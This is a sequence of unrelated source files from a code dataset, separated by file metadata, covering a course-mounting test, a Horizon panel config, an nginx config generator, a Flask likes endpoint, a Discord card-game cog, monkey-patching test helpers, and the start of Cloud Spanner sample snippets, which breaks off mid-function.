Tests that a module that is unmounted from both sems
will have the tentative-mounting values '0' and '0'
'''
test_module_code = "BB1001"
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 1')
model.delete_tenta_mounting(test_module_code, self.next_ay+' Sem 2')
self.module_overview_handler.load_fixed_mounting_plan(test_module_code)
self.module_overview_handler.load_tenta_mounting_plan(test_module_code)
tenta_mounting_plan = self.module_overview_handler.tenta_mounting_plan
assert_true(len(tenta_mounting_plan) > 0)
tenta_sem_1_mounting_value = tenta_mounting_plan[0][1]
tenta_sem_1_quota = tenta_mounting_plan[0][2]
tenta_sem_2_mounting_value = tenta_mounting_plan[1][1]
tenta_sem_2_quota = tenta_mounting_plan[1][2]
assert_equal(tenta_sem_1_mounting_value, 0)
assert_equal(tenta_sem_1_quota, '-')
assert_equal(tenta_sem_2_mounting_value, 0)
assert_equal(tenta_sem_2_quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 10)
self.mounting_view_handler.load_mounting_info(test_module_code, self.current_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 1)
assert_equal(self.mounting_view_handler.quota, 20)
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 1')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
self.mounting_view_handler.load_mounting_info(test_module_code, self.next_ay+' Sem 2')
assert_equal(self.mounting_view_handler.mounting_status, 0)
assert_equal(self.mounting_view_handler.quota, '-')
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 1', 10)
model.add_tenta_mounting(test_module_code, self.next_ay+' Sem 2', 20)
| 48.32337
| 100
| 0.714503
|
4a07dbd2759e1adc3cea2779e0b4dbe21b23ca02
| 39
|
py
|
Python
|
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
lang/py/cookbook/v2/source/cb2_19_4_exm_3.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | null | null | null |
c = iter(t5)
a = c.next()
b = c.next()
| 9.75
| 12
| 0.487179
|
4a07dc31aec5bc3107b692bc44cb4849f5a82f1b
| 985
|
py
|
Python
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | 1
|
2021-11-03T12:00:44.000Z
|
2021-11-03T12:00:44.000Z
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | 1
|
2018-10-17T10:59:55.000Z
|
2018-10-30T11:58:40.000Z
|
iotronic_ui/enabled/_6030_iot_services_panel.py
|
smartmeio/stack4things-iotronic-ui
|
b0324c020bb4d5d74cfa9795f90c02fadae4fa8b
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The slug of the panel to be added to HORIZON_CONFIG. Required.
PANEL = 'services'
# The slug of the dashboard the PANEL associated with. Required.
PANEL_DASHBOARD = 'iot'
# The slug of the panel group the PANEL is associated with.
PANEL_GROUP = 'iot'
# If set, it will update the default panel of the PANEL_DASHBOARD.
DEFAULT_PANEL = ''
# Python panel class of the PANEL to be added.
ADD_PANEL = 'iotronic_ui.iot.services.panel.Services'
| 41.041667
| 74
| 0.763452
|
4a07dc9eb9317135abe983bf307ea03b02545093
| 10,018
|
py
|
Python
|
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
management/web_update.py
|
doofpot/mailinabox
|
421846f06736b1af5fcb0e6dfdb731c90077f8fa
|
[
"CC0-1.0"
] | null | null | null |
# Creates an nginx configuration file so we serve HTTP/HTTPS on all
# domains for which a mail account has been set up.
########################################################################
import os.path, re, rtyaml
from mailconfig import get_mail_domains
from dns_update import get_custom_dns_config, get_dns_zones
from ssl_certificates import get_ssl_certificates, get_domain_ssl_files, check_certificate
from utils import shell, safe_domain_name, sort_domains
def get_web_domains(env, include_www_redirects=True, exclude_dns_elsewhere=True):
# What domains should we serve HTTP(S) for?
domains = set()
# Serve web for all mail domains so that we might at least
# provide auto-discover of email settings, and also a static website
# if the user wants to make one.
domains |= get_mail_domains(env)
if include_www_redirects:
# Add 'www.' subdomains that we want to provide default redirects
# to the main domain for. We'll add 'www.' to any DNS zones, i.e.
# the topmost of each domain we serve.
domains |= set('www.' + zone for zone, zonefile in get_dns_zones(env))
# Add Autoconfiguration domains, allowing us to serve correct SSL certs.
# 'autoconfig.' for Mozilla Thunderbird auto setup.
# 'autodiscover.' for Activesync autodiscovery.
domains |= set('autoconfig.' + maildomain for maildomain in get_mail_domains(env))
domains |= set('autodiscover.' + maildomain for maildomain in get_mail_domains(env))
# 'mta-sts.' for MTA-STS support.
domains |= set('mta-sts.' + maildomain for maildomain in get_mail_domains(env))
if exclude_dns_elsewhere:
# ...Unless the domain has an A/AAAA record that maps it to a different
# IP address than this box. Remove those domains from our list.
domains -= get_domains_with_a_records(env)
# Ensure the PRIMARY_HOSTNAME is in the list so we can serve webmail
# as well as Z-Push for Exchange ActiveSync. This can't be removed
# by a custom A/AAAA record and is never a 'www.' redirect.
domains.add(env['PRIMARY_HOSTNAME'])
# Sort the list so the nginx conf gets written in a stable order.
domains = sort_domains(domains, env)
return domains
def get_domains_with_a_records(env):
domains = set()
dns = get_custom_dns_config(env)
for domain, rtype, value in dns:
if rtype == "CNAME" or (rtype in ("A", "AAAA") and value not in ("local", env['PUBLIC_IP'])):
domains.add(domain)
return domains
def get_web_domains_with_root_overrides(env):
# Load custom settings so we can tell what domains have a redirect or proxy set up on '/',
# which means static hosting is not happening.
root_overrides = { }
nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml")
if os.path.exists(nginx_conf_custom_fn):
custom_settings = rtyaml.load(open(nginx_conf_custom_fn))
for domain, settings in custom_settings.items():
for type, value in [('redirect', settings.get('redirects', {}).get('/')),
('proxy', settings.get('proxies', {}).get('/'))]:
if value:
root_overrides[domain] = (type, value)
return root_overrides
def do_web_update(env):
# Pre-load what SSL certificates we will use for each domain.
ssl_certificates = get_ssl_certificates(env)
# Build an nginx configuration file.
nginx_conf = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-top.conf")).read()
# Load the templates.
template0 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx.conf")).read()
template1 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-alldomains.conf")).read()
template2 = open(os.path.join(os.path.dirname(__file__), "../conf/nginx-primaryonly.conf")).read()
template3 = "\trewrite ^(.*) https://$REDIRECT_DOMAIN$1 permanent;\n"
# Add the PRIMARY_HOST configuration first so it becomes nginx's default server.
nginx_conf += make_domain_config(env['PRIMARY_HOSTNAME'], [template0, template1, template2], ssl_certificates, env)
# Add configuration all other web domains.
has_root_proxy_or_redirect = get_web_domains_with_root_overrides(env)
web_domains_not_redirect = get_web_domains(env, include_www_redirects=False)
for domain in get_web_domains(env):
if domain == env['PRIMARY_HOSTNAME']:
# PRIMARY_HOSTNAME is handled above.
continue
if domain in web_domains_not_redirect:
# This is a regular domain.
if domain not in has_root_proxy_or_redirect:
nginx_conf += make_domain_config(domain, [template0, template1], ssl_certificates, env)
else:
nginx_conf += make_domain_config(domain, [template0], ssl_certificates, env)
else:
# Add default 'www.' redirect.
nginx_conf += make_domain_config(domain, [template0, template3], ssl_certificates, env)
# Did the file change? If not, don't bother writing & restarting nginx.
nginx_conf_fn = "/etc/nginx/conf.d/local.conf"
if os.path.exists(nginx_conf_fn):
with open(nginx_conf_fn) as f:
if f.read() == nginx_conf:
return ""
# Save the file.
with open(nginx_conf_fn, "w") as f:
f.write(nginx_conf)
# Kick nginx. Since this might be called from the web admin
# don't do a 'restart'. That would kill the connection before
# the API returns its response. A 'reload' should be good
# enough and doesn't break any open connections.
shell('check_call', ["/usr/sbin/service", "nginx", "reload"])
return "web updated\n"
def make_domain_config(domain, templates, ssl_certificates, env):
# GET SOME VARIABLES
# Where will its root directory be for static files?
root = get_web_root(domain, env)
# What private key and SSL certificate will we use for this domain?
tls_cert = get_domain_ssl_files(domain, ssl_certificates, env)
# ADDITIONAL DIRECTIVES.
nginx_conf_extra = ""
# Because the certificate may change, we should recognize this so we
# can trigger an nginx update.
def hashfile(filepath):
import hashlib
sha1 = hashlib.sha1()
f = open(filepath, 'rb')
try:
sha1.update(f.read())
finally:
f.close()
return sha1.hexdigest()
nginx_conf_extra += "# ssl files sha1: %s / %s\n" % (hashfile(tls_cert["private-key"]), hashfile(tls_cert["certificate"]))
# Add in any user customizations in YAML format.
hsts = "yes"
nginx_conf_custom_fn = os.path.join(env["STORAGE_ROOT"], "www/custom.yaml")
if os.path.exists(nginx_conf_custom_fn):
yaml = rtyaml.load(open(nginx_conf_custom_fn))
if domain in yaml:
yaml = yaml[domain]
# any proxy or redirect here?
for path, url in yaml.get("proxies", {}).items():
nginx_conf_extra += "\tlocation %s {" % path
nginx_conf_extra += "\n\t\tproxy_pass %s;" % url
nginx_conf_extra += "\n\t\tproxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;"
nginx_conf_extra += "\n\t}\n"
for path, alias in yaml.get("aliases", {}).items():
nginx_conf_extra += "\tlocation %s {" % path
nginx_conf_extra += "\n\t\talias %s;" % alias
nginx_conf_extra += "\n\t}\n"
for path, url in yaml.get("redirects", {}).items():
nginx_conf_extra += "\trewrite %s %s permanent;\n" % (path, url)
# override the HSTS directive type
hsts = yaml.get("hsts", hsts)
# Add the HSTS header.
if hsts == "yes":
nginx_conf_extra += "add_header Strict-Transport-Security max-age=15768000;\n"
elif hsts == "preload":
nginx_conf_extra += "add_header Strict-Transport-Security \"max-age=15768000; includeSubDomains; preload\";\n"
# Add in any user customizations in the includes/ folder.
nginx_conf_custom_include = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(domain) + ".conf")
if os.path.exists(nginx_conf_custom_include):
nginx_conf_extra += "\tinclude %s;\n" % (nginx_conf_custom_include)
# PUT IT ALL TOGETHER
# Combine the pieces. Iteratively place each template into the "# ADDITIONAL DIRECTIVES HERE" placeholder
# of the previous template.
nginx_conf = "# ADDITIONAL DIRECTIVES HERE\n"
for t in templates + [nginx_conf_extra]:
nginx_conf = re.sub("[ \t]*# ADDITIONAL DIRECTIVES HERE *\n", t, nginx_conf)
# Replace substitution strings in the template & return.
nginx_conf = nginx_conf.replace("$STORAGE_ROOT", env['STORAGE_ROOT'])
nginx_conf = nginx_conf.replace("$HOSTNAME", domain)
nginx_conf = nginx_conf.replace("$ROOT", root)
nginx_conf = nginx_conf.replace("$SSL_KEY", tls_cert["private-key"])
nginx_conf = nginx_conf.replace("$SSL_CERTIFICATE", tls_cert["certificate"])
nginx_conf = nginx_conf.replace("$REDIRECT_DOMAIN", re.sub(r"^www\.", "", domain)) # for default www redirects to parent domain
return nginx_conf
def get_web_root(domain, env, test_exists=True):
# Try STORAGE_ROOT/web/domain_name if it exists, but fall back to STORAGE_ROOT/web/default.
for test_domain in (domain, 'default'):
root = os.path.join(env["STORAGE_ROOT"], "www", safe_domain_name(test_domain))
if os.path.exists(root) or not test_exists: break
return root
def get_web_domains_info(env):
www_redirects = set(get_web_domains(env)) - set(get_web_domains(env, include_www_redirects=False))
has_root_proxy_or_redirect = set(get_web_domains_with_root_overrides(env))
ssl_certificates = get_ssl_certificates(env)
# for the SSL config panel, get cert status
def check_cert(domain):
try:
tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True)
except OSError: # PRIMARY_HOSTNAME cert is missing
tls_cert = None
if tls_cert is None: return ("danger", "No certificate installed.")
cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"])
if cert_status == "OK":
return ("success", "Signed & valid. " + cert_status_details)
elif cert_status == "SELF-SIGNED":
return ("warning", "Self-signed. Get a signed certificate to stop warnings.")
else:
return ("danger", "Certificate has a problem: " + cert_status)
return [
{
"domain": domain,
"root": get_web_root(domain, env),
"custom_root": get_web_root(domain, env, test_exists=False),
"ssl_certificate": check_cert(domain),
"static_enabled": domain not in (www_redirects | has_root_proxy_or_redirect),
}
for domain in get_web_domains(env)
]
| 41.741667
| 128
| 0.729387
|
4a07dcaeb700f605cea63b1f679a5579981351cf
| 899
|
py
|
Python
|
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
flask/code/P6.FlaskDotEnvJwtCrud/controllers/likes_controller.py
|
santiagovj22/python-training
|
3fbcc9e5df22432c6e75d80c90d1c235652354df
|
[
"MIT"
] | null | null | null |
from flask import request
from flask_restx import Resource
from flask_jwt_extended import jwt_required, get_jwt_identity
from services.likes_service import init_service, get_likes, add_likes, remove_likes
def init_likes_controller(api, app):
    """Register the likes REST resource on *api* and initialize its service.

    Routes are mounted at /games/<game_id>/likes; all verbs require a JWT.
    """
    init_service(app)
    #game_model = get_game_model(api)

    class UserLikesList(Resource):
        """A resource controller for the likes from users on a game"""

        @jwt_required
        def get(self, game_id):
            # Listing likes needs authentication but no identity lookup.
            return get_likes(game_id)

        @jwt_required
        def post(self, game_id):
            # The liking user is taken from the JWT, not the request body.
            identity = get_jwt_identity()
            return add_likes(game_id, identity['user_id'])

        @jwt_required
        def delete(self, game_id):
            identity = get_jwt_identity()
            return remove_likes(game_id, identity['user_id'])

    api.add_resource(UserLikesList, '/games/<string:game_id>/likes')
| 31
| 83
| 0.681869
|
4a07ddae2836d5fab1fcbcffe6348e9eec4dc484
| 9,893
|
py
|
Python
|
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | null | null | null |
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | 1
|
2021-01-31T12:37:06.000Z
|
2021-01-31T12:37:06.000Z
|
higherorlower/core.py
|
kreus7/HigherOrLower
|
a1189f7c26e1f6bb7e68e122b24433d8390c5f23
|
[
"MIT"
] | null | null | null |
import discord
from typing import Literal
from random import randint
from asyncio import sleep, TimeoutError
from redbot.core import bank, commands, Config
from redbot.core.i18n import Translator, cog_i18n
from .generators import embed
from .cards import BACKALL
_ = Translator("HigherOrLower", __file__)
@cog_i18n(_)
class HigherOrLower(commands.Cog):
    """
    Play the higher or lower card game!

    For more information, take a read [here](https://kreusadacogs.readthedocs.io/en/latest/higherorlower.html#higherorlower).
    """

    __author__ = "Kreusada"
    __version__ = "1.3.0"

    def __init__(self, bot):
        self.bot = bot
        # Config schema: guild-level game settings, user-level game state.
        self.config = Config.get_conf(self, 439583, force_registration=True)
        self.config.register_guild(
            bank=False,   # whether bank payouts are enabled
            round=0,      # payout for winning a whole round
            per=0,        # payout per correctly guessed card
            qs=9          # number of cards to guess per round
        )
        self.config.register_user(
            draw=None,    # last drawn card value (None = fresh game)
            image=False,  # large image embeds instead of thumbnails
            count=1       # current card number within the round
        )

    def format_help_for_context(self, ctx: commands.Context) -> str:
        """Thanks Sinbad."""
        return f"{super().format_help_for_context(ctx)}\n\nAuthor: {self.__author__}\nVersion: {self.__version__}"

    async def red_delete_data_for_user(
        self,
        requester: Literal["discord", "owner", "user", "user_strict"],
        user_id: int
    ) -> None:
        # Data-removal hook required by Red: drop all stored user state.
        await self.config.user_from_id(user_id).clear()

    @commands.command()
    async def hol(self, ctx: commands.Context):
        """
        Play higher or lower!

        Guess if the next number will be higher or lower based on a standard pack of cards.
        For more information, please take a look [here](https://kreusadacogs.readthedocs.io/en/latest/higherorlower.html#higherorlower).
        """
        banke = await self.config.guild(ctx.guild).bank()
        currency = await bank.get_currency_name(ctx.guild)
        per = await self.config.guild(ctx.guild).per()
        round = await self.config.guild(ctx.guild).round()
        qs = await self.config.guild(ctx.guild).qs()
        await ctx.send(f"Let's get started {ctx.author.name}. Remember to answer with either `higher`, `h`, `lower` or `l`.")

        def check(x):
            # Accept only replies from the invoking user in the same
            # channel that start with h/l.
            return x.author == ctx.author and x.channel == ctx.channel and x.content.lower().startswith(("h", "l"))

        for i in range(int(qs)):
            draw = await self.config.user(ctx.author).draw()
            msg = f"❌ Oh no {ctx.author.name}! "  # prefix reused by the timeout message
            if not draw:
                # Fresh game: draw the starting card. Values 2..14,
                # where 11-14 render as Jack/Queen/King/Ace.
                A = randint(2, 14)
            else:
                A = draw
            B = randint(2, 14)
            await sleep(1)
            E = await embed(ctx.author.name, A, await self.config.user(ctx.author).image(), await self.config.user(ctx.author).count(), qs)
            await ctx.send(embed=E)
            try:
                choice = await self.bot.wait_for("message", timeout=40, check=check)
            except TimeoutError:
                e = discord.Embed(description=msg + "You took too long to respond.", color=0xFF0000)
                await ctx.send(embed=e)
                # Reset the user's game state on timeout.
                await self.config.user(ctx.author).draw.set(None)
                await self.config.user(ctx.author).count.set(1)
                break
            if choice.content.lower().startswith(("h")) and B > A or choice.content.lower().startswith(("l")) and B < A:
                # Correct guess: pay out (if enabled) and carry B over as
                # the next iteration's starting card.
                e = discord.Embed(description=f"✅ Great work! The next number is...", color=0x00FF00)
                if banke is True:
                    await bank.deposit_credits(ctx.author, per)
                    e.set_footer(text=f"+{per} has been added to your bank account.")
                await ctx.send(embed=e)
                await self.config.user(ctx.author).draw.set(B)
                count = await self.config.user(ctx.author).count()
                count += 1
                await self.config.user(ctx.author).count.set(count)
                continue
            elif choice.content.lower().startswith("h") and B == A or choice.content.lower().startswith("l") and B == A:
                # A tie counts as a pass: same payout, game continues.
                e = discord.Embed(description=f"😌 The results were the same! The next number is...", color=0xFFFF00)
                if banke is True:
                    e.set_footer(text=f"+{per} has been added to your bank account.")
                    await bank.deposit_credits(ctx.author, per)
                await ctx.send(embed=e)
                await self.config.user(ctx.author).draw.set(B)
                count = await self.config.user(ctx.author).count()
                count += 1
                await self.config.user(ctx.author).count.set(count)
                continue
            else:
                # Wrong guess: translate face-card values for the message,
                # then reset the user's game state.
                if B == 11:
                    B = "Jack"
                elif B == 12:
                    B = "Queen"
                elif B == 13:
                    B = "King"
                elif B == 14:
                    B = "Ace"
                else:
                    B = B
                e = discord.Embed(description=f"❌ Oh no {ctx.author.name}! The next card was a {B}.", color=0xFF0000)
                await ctx.send(embed=e)
                await self.config.user(ctx.author).draw.set(None)
                await self.config.user(ctx.author).count.set(1)
                break
        else:
            # for/else: the loop completed without a break, meaning the
            # user answered every card correctly — round won.
            if banke is True:
                await bank.deposit_credits(ctx.author, round)
                description = f"🎉 You MADE IT {ctx.author.name}!! Awesome work!\n{round} {currency} has been added to your bank account."
                E = discord.Embed(description=description, color=0x00FF00)
                await ctx.send(embed=E)
            else:
                E = discord.Embed(description=f"🎉 You MADE IT {ctx.author.name}!! Awesome work!", color=0x00FF00)
                await ctx.send(embed=E)
            await self.config.user(ctx.author).draw.set(None)
            await self.config.user(ctx.author).count.set(1)

    @commands.group()
    async def holset(self, ctx: commands.Context):
        """Settings for higher or lower."""

    @holset.command()
    @commands.mod_or_permissions(administrator=True)
    async def perpayout(self, ctx: commands.Context, payout: int):
        """Sets the bank payout per answer."""
        currency = await bank.get_currency_name(ctx.guild)
        if payout > 1000:
            await ctx.send(f"{payout} exceeds the maximum payout. Please go lower.")
        else:
            await self.config.guild(ctx.guild).per.set(payout)
            await ctx.send(f"Done. Users will now receive {payout} {currency} when they correctly guess a card.")

    @holset.command()
    @commands.mod_or_permissions(administrator=True)
    async def total(self, ctx: commands.Context, cards: int):
        """
        Set the total of answered cards needed to win.

        This value defaults to 9.
        """
        currency = await bank.get_currency_name(ctx.guild)  # NOTE(review): unused in this command — confirm
        if cards <= 3:
            await ctx.send(f"Setting the required cards to {int(cards)} would be too easy. Please go higher.")
        elif cards >= 20:
            await ctx.send(f"Setting the required cards to {int(cards)}... would that even be possible? Please go lower.")
        else:
            await self.config.guild(ctx.guild).qs.set(cards)
            await ctx.send(f"Users will now have to answer {int(cards)} cards correctly before winning.")

    @holset.command()
    @commands.mod_or_permissions(administrator=True)
    async def roundpayout(self, ctx: commands.Context, payout: int):
        """Sets the bank payout if all 9 cards are correctly guessed."""
        currency = await bank.get_currency_name(ctx.guild)
        if payout > 100000:
            await ctx.send(f"{payout} exceeds the maximum payout. Please go lower.")
        else:
            await self.config.guild(ctx.guild).round.set(payout)
            await ctx.send(f"Done. Users will now receive {payout} {currency} when they correctly guess all nine cards.")

    @holset.command()
    @commands.mod_or_permissions(administrator=True)
    async def togglebank(self, ctx: commands.Context, true_or_false: bool = False):
        """Toggle the bank ON. Defaults to False."""
        if true_or_false is False:
            await self.config.guild(ctx.guild).bank.set(False)
            await ctx.send(
                f"The bank is now off.\n"
                f"You can turn it on by using `{ctx.clean_prefix}holset togglebank true`."
            )
        else:
            await self.config.guild(ctx.guild).bank.set(True)
            await ctx.send(
                f"The bank is now ON.\n"
                f"Round payout: {int(await self.config.guild(ctx.guild).round())} <-"
                f"`Modify using {ctx.clean_prefix}holset roundpayout`.\n"
                f"Per-card payout: {int(await self.config.guild(ctx.guild).per())} <-"
                f"`Modify using {ctx.clean_prefix}holset perpayout`."
            )

    @holset.command()
    async def image(self, ctx: commands.Context, true_or_false: bool):
        """
        Specify whether you would like an image card.

        Defaults are set to False (thumbnail).
        """
        if true_or_false is False:
            await self.config.user(ctx.author).image.set(False)
            E = discord.Embed(title="Thumbnail responses", description="Embeds will now be sent like this.", color=0xFF0000)
            E.set_thumbnail(url=BACKALL)
            E.set_footer(text="The image stays nice and small, perfect for mobile.")
            await ctx.send(embed=E)
        else:
            await self.config.user(ctx.author).image.set(True)
            E = discord.Embed(title="Image responses", description="Embeds will now be sent like this.", color=0xFF0000)
            E.set_image(url=BACKALL)
            E.set_footer(text="The image is nice and large, perfect for desktop.")
            await ctx.send(embed=E)
| 45.800926
| 139
| 0.585363
|
4a07ded362ec5d0241f53ffe7d71f90a0bd04903
| 907
|
py
|
Python
|
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
src/tools.py
|
nkashy1/mockingbird
|
89c6c669c7ea879a8dd986bf3a2f66d7deb7fbe9
|
[
"MIT"
] | null | null | null |
# Standard modules
# External modules
# Internal modules
def patch_returner(obj, name, fake_method_return_value):
    """Monkey-patch ``obj.name`` with a method that always returns the given value."""
    monkey_patch(obj, name, create_fake_returner(fake_method_return_value))
def patch_caller(obj, name, function_to_call, *args, **kwargs):
    # Monkey-patch ``obj.name`` with a method that delegates to *function_to_call*.
    # NOTE(review): ``create_fake_caller`` in this file accepts only
    # ``function_to_call``, so passing extra *args/**kwargs here raises
    # TypeError — confirm intended behavior.
    fake_caller = create_fake_caller(function_to_call, *args, **kwargs)
    monkey_patch(obj, name, fake_caller)
def monkey_patch(obj, name, function):
    """Bind *function* to *obj* as a method and install it under *name*."""
    # ``__get__`` invokes the descriptor protocol, producing a bound method
    # whose first argument is already fixed to *obj*.
    setattr(obj, name, function.__get__(obj))
def create_fake_returner(fake_returner_return_value):
    """Build an unbound method that ignores all arguments and returns a fixed value."""
    def fake_returner(self, *_args, **_kwargs):
        # The captured value is returned regardless of what the caller passes.
        return fake_returner_return_value
    return fake_returner
def create_fake_caller(function_to_call, *args, **kwargs):
    """Build an unbound method that delegates every call to *function_to_call*.

    Fixed positional arguments given here are prepended to each call's
    arguments, and fixed keyword arguments are merged (per-call keywords
    win).  This matches how ``patch_caller`` invokes this factory with
    ``*args, **kwargs``; previously those extra arguments raised TypeError
    because this function accepted only ``function_to_call``.

    Backward compatible: with no extra arguments the behavior is unchanged.
    """
    def fake_caller(self, *method_args, **method_kwargs):
        merged_kwargs = dict(kwargs)
        merged_kwargs.update(method_kwargs)
        return function_to_call(*args, *method_args, **merged_kwargs)
    return fake_caller
| 25.914286
| 71
| 0.757442
|
4a07ded3ca997fbbd62c475abf683131d9220196
| 16,708
|
py
|
Python
|
spanner/cloud-client/snippets.py
|
arbatovdan/new
|
f36d2bf4846061ea22b35775c8074bcd5bec3788
|
[
"Apache-2.0"
] | 1
|
2017-06-28T13:04:34.000Z
|
2017-06-28T13:04:34.000Z
|
spanner/cloud-client/snippets.py
|
Acidburn0zzz/python-docs-samples
|
bc0924a6826cbdb669415b58fd5b2d8534d87aa1
|
[
"Apache-2.0"
] | null | null | null |
spanner/cloud-client/snippets.py
|
Acidburn0zzz/python-docs-samples
|
bc0924a6826cbdb669415b58fd5b2d8534d87aa1
|
[
"Apache-2.0"
] | 1
|
2021-01-13T21:45:31.000Z
|
2021-01-13T21:45:31.000Z
|
#!/usr/bin/env python
# Copyright 2016 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to do basic operations using Cloud
Spanner.
For more information, see the README.rst under /spanner.
"""
import argparse
from google.cloud import spanner
def create_database(instance_id, database_id):
    """Creates a database and tables for sample data."""
    client = spanner.Client()
    database = client.instance(instance_id).database(database_id, ddl_statements=[
        """CREATE TABLE Singers (
            SingerId INT64 NOT NULL,
            FirstName STRING(1024),
            LastName STRING(1024),
            SingerInfo BYTES(MAX)
        ) PRIMARY KEY (SingerId)""",
        """CREATE TABLE Albums (
            SingerId INT64 NOT NULL,
            AlbumId INT64 NOT NULL,
            AlbumTitle STRING(MAX)
        ) PRIMARY KEY (SingerId, AlbumId),
        INTERLEAVE IN PARENT Singers ON DELETE CASCADE"""
    ])

    # create() is a long-running operation; block until it finishes.
    operation = database.create()
    print('Waiting for operation to complete...')
    operation.result()

    print('Created database {} on instance {}'.format(
        database_id, instance_id))
def insert_data(instance_id, database_id):
    """Inserts sample data into the given database.

    The database and table must already exist and can be created using
    `create_database`.
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    singer_rows = [
        (1, u'Marc', u'Richards'),
        (2, u'Catalina', u'Smith'),
        (3, u'Alice', u'Trentor'),
        (4, u'Lea', u'Martin'),
        (5, u'David', u'Lomond')]
    album_rows = [
        (1, 1, u'Go, Go, Go'),
        (1, 2, u'Total Junk'),
        (2, 1, u'Green'),
        (2, 2, u'Forever Hold Your Peace'),
        (2, 3, u'Terrified')]

    # A batch applies all queued mutations atomically on context exit.
    with database.batch() as batch:
        batch.insert(
            table='Singers',
            columns=('SingerId', 'FirstName', 'LastName',),
            values=singer_rows)
        batch.insert(
            table='Albums',
            columns=('SingerId', 'AlbumId', 'AlbumTitle',),
            values=album_rows)

    print('Inserted data.')
def query_data(instance_id, database_id):
    """Queries sample data from the database using SQL."""
    database = spanner.Client().instance(instance_id).database(database_id)

    rows = database.execute_sql(
        'SELECT SingerId, AlbumId, AlbumTitle FROM Albums')
    for row in rows:
        print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
def read_data(instance_id, database_id):
    """Reads sample data from the database."""
    database = spanner.Client().instance(instance_id).database(database_id)

    # KeySet(all_=True) selects every row in the table.
    rows = database.read(
        table='Albums',
        columns=('SingerId', 'AlbumId', 'AlbumTitle',),
        keyset=spanner.KeySet(all_=True),)
    for row in rows:
        print(u'SingerId: {}, AlbumId: {}, AlbumTitle: {}'.format(*row))
def query_data_with_new_column(instance_id, database_id):
    """Queries sample data from the database using SQL.

    This sample uses the `MarketingBudget` column. You can add the column
    by running the `add_column` sample or by running this DDL statement
    against your database:

        ALTER TABLE Albums ADD COLUMN MarketingBudget INT64
    """
    database = spanner.Client().instance(instance_id).database(database_id)

    rows = database.execute_sql(
        'SELECT SingerId, AlbumId, MarketingBudget FROM Albums')
    for row in rows:
        print(u'SingerId: {}, AlbumId: {}, MarketingBudget: {}'.format(*row))
def add_index(instance_id, database_id):
    """Adds a simple index to the example database."""
    database = spanner.Client().instance(instance_id).database(database_id)

    operation = database.update_ddl([
        'CREATE INDEX AlbumsByAlbumTitle ON Albums(AlbumTitle)'])

    # update_ddl is asynchronous; block until the schema change lands.
    print('Waiting for operation to complete...')
    operation.result()

    print('Added the AlbumsByAlbumTitle index.')
def query_data_with_index(
